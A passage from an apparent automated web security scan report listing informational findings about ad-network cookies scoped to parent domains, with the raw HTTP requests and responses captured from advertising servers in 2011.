Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; u="aABnAgfAg==AI89bBrQ==AAABLzpChvs="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; e=cd; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: u="aABnAm_Fg==AI89bBrQ==AAABLzpCn-0=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:35 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:35 GMT
Content-Type: image/gif
Content-Length: 42
Cache-Control: no-cache


5.7. http://a1.interclick.com/ColDta.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /ColDta.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ColDta.aspx HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/DtCol.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=a53875b5-a877-4a03-ad1a-e28c70299475; ucap=sl=1; FC_51=113861=17621725:1; IFC=n=1&w13741=1&a113861=1&e=634382119927363227; Aqprep_Banner300X250=113861=634381255927393227:13741; Li=1=734237&30=734237; tpd=i20=&e20=1305135081313&i90=&e90=1303147881323&i50=&e50=1305135081318&i100=&e100=1303147881396

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: tpd=e20=1305135081313&e90=1303147881323&e50=1305135081318&e100=1303147881396; domain=.interclick.com; expires=Wed, 11-May-2011 17:33:17 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 11 Apr 2011 17:33:16 GMT


5.8. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=4608069584519221037 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=rQ1Ia8xMj0KaI6M6V7+M3Q; s=1,2*4d9a32eb*X4TKR-a8TD*MbX-VAoK_2NCLHMLyLVahutgcQ==*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4d9a32eb*gNkbP117fj*Xk4nbYfLb776H4OdvScWOgThiQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

5.9. http://ad.doubleclick.net/adj/wn.loc.wcax/political

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/political

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/wn.loc.wcax/political;sz=850x30;wnsz=85;tile=1;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;apptype=platform;env=production;ord=81143749? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 09 Apr 2011 12:53:17 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sat, 09 Apr 2011 12:38:17 GMT
Expires: Sat, 09 Apr 2011 12:38:17 GMT
Cache-Control: private
Content-Length: 1434

document.write('<!-- Template ID = 8688 Template Name = +WorldNow Pencil Pushdown: Images -->\n\n<!-- Template Id = 8688 Template Name = WorldNow Pencil Pushdown: Images -->\n<DIV align=center><A href
...[SNIP]...

5.10. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid=595414&bimpd=bvq28451foJSYWMGSWpGLm57PuP1ep3e8pYSpjMgXYBgzZsm_MD3Ph0_AT4tfqL1DmeJqXqoXz4419yIOhU5gOeJMESGQq7G9iOXNAB4-MSg_E-gdQPFfwGO456s277eQI6aJFALXQQZneqbwRBx74CSLEVQbXs-IEXofIReOpq_XD26qi_jA_AuAQLWcK-tlTKPEPwzWzLjcG0petCQ0kOZWgcTS_a_4u4oxn8pOmWjHRY6EBGuSwXwHGMEC0xL3dnura1cEVep9swAHPGcQgMIlGKLUwZcdE7RzNOB1XKprf8mRndDhhFf8Sdys88gdgxCVuolRLb7Z-3WuXH2eelAZ6GtOP-ASuDVvjj6Alva3C8QNQcmEuoh5hLm8UhVLPCQNQ1NJ6FtytBorXofoFtBivKRqgKwft45cpCMCxp949Lefsp8QsMgMdbB8_G407eUqjR_zXj68onFm3lvdZYjcV-mkQxfnW3r5gh2ZcKhGAdZc50HfofVzLGPk2rHHwOWv-gGYK-_EdRAynUJQc9OQ0JCH3IRRC2v9iFYyIGsJ_FzMFXQEDgUfSCtUSLiNCZslCDsmK2JC-xdJmz2cjfYrblFN1Vrq7tHBSJG_h8MbnZNh9bOlTF5VJxTMpf6PQwEcwTA1AnGV4Q2SYTL57oEC7wd4-ropmSQNL3Tn8jt_T370WDWWY1SqEwEJwbhIPZgphozREaBUNGGZK6KHTQH4WG9KeAs_FmnJA3_tygz_AroS6eWPLNVODVq-iRPeSnzq5ViiHXxn7qhO2_sdw&acp=0.027583195495811192 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15069%7C15069%7C15069%7C15069%7Cundefined%7C15069; rv=1; uid=4608069584519221037; pf=cu1FbtXKKpFof-hWjfkQRcVIkA_tbns9D4-b88MB0l6CH-nC-kQ69MLaDP7avFRDzd5xTtrRgn51HC41qoSB9_pqNLucEh96CCAoHJ73Ep-dCbxIubA9vJ0TJiztXY_3cxb2oDS_ZBeMeceweOTTRM5O3f8IMqs1jnadlyIx8Ew

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 11 Apr 2011 12:35:43 GMT
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=tmY-x8L_yowSJFqM0vF4Y8CuY9t_hBSzjQil7z33OlYpagDPKKctVczI9DEFcEkPcxpGHxRlubu1xR21Mxu4g-sHDXOosP1lwOMr_-ta2t973bvsD6p3TnXOe8vTPY4VFaT6eTBuV55JRFz8lx3PqdqozOSXNU0m0cAav4sZMCcTY1vGdjvt8S43nB6dS9OmxjcTGL1eKfAUVOMXIUnylA; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: fc=eFAOz3ilQ4gYIBtFIJGWAE5_UN3y883I71mcX_0aEuuubHizRKm2LPdnMwd17GsW3WQO872ou4xvEVRnVXW81PsHnm-jU8W9DeXq1d2r1JKkV1vPzSwkQiZJzLr4lAFo; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: pf=snK9kHUjEl1FaWKxPCEh1sJ8lErb_iSlHvQid9sfqYGDVsdGVkOFL386xes7a4VRH-w_0yHZxr5U-a1ULJAMKQRyElVn9VAUzXky4Bxf5K8hlcBpkm8Sg5-23YdyuJpz9_hZk2y4Lc1tg0PRNwxT__KovNH6HfPSeeybFLsgN_DN9JRYGQVWUbjEaPiKqkBr8AkkycJ0w6q2tbQDIXhSrAgkLZbHfwITF7RboAby-GXjYWEb1kaerphA9cWJarOLh_BwiBS09OfPB0I41L7nq5FuSGZvCDWT_YGlhDw-_9zGhvu2FiJEpdM7zDK0xqeWNUj9wzAaHETIIAZhDZgOW6C-zFUZM9OcnDkQKyl2S7I; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 10051


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

5.11. http://admeld.adnxs.com/usersync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=8663496762294337265; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:21:19 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=8663496762294337265&expiration=0" width="0" height="0"/>');

5.12. http://admeld.lucidmedia.com/clicksense/admeld/match

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:19 GMT
Expires: Mon, 11 Apr 2011 16:31:19 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2x5NmZC-t7Z; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:19 GMT; Path=/
Content-Length: 164
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3406242120278446565"/>');

5.13. http://ads.adap.tv/beacons

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacons?callback=jsonp1302352256751 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-6740737079467195442__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 579

jsonp1302352256751({
   "beacons":["http://tags.bluekai.com/site/2174", "http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pixel.quantserve.com/seg/r;a=p-573scDfDoUH6o;redirec
...[SNIP]...

5.14. http://ads.adap.tv/cookie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /cookie

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cookie?pageUrl=http://www.wptz.com/news/27483035/detail.html&isTop=true&callback=1 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="724771479354552954__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/html
Set-Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-Ih8ErlmQyxh/jTTH/xtpQjCqPVjzIafrKmPMbhDYLFSNHlonA/EwBN8wEKrozBrD-Joz0kZO3Wd8;Path=/;Domain=.adap.tv
Content-Length: 0
Server: Jetty(6.1.22)


5.15. http://ads.adbrite.com/adserver/vdi/682865

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Sat, 09 Apr 2011 12:35:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052ad@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:57 GMT
Set-Cookie: rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:57 GMT
Content-Length: 0


5.16. http://ads.adbrite.com/adserver/vdi/684339

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b2@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:02 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d97b063-cd55-fcc9-f79b-3dc3c331fd5b:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0";Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:02 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.17. http://ads.adbrite.com/adserver/vdi/712156

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/712156

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/712156?d=1iolb30nur9ak HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; vsd=0@1@4d9d6e04@cti.w55c.net; rb=0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:22:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Sun, 10-Apr-2011 00:22:01 GMT
Set-Cookie: vsd=0@1@4d9fa6a9@s7.addthis.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 00:22:01 GMT
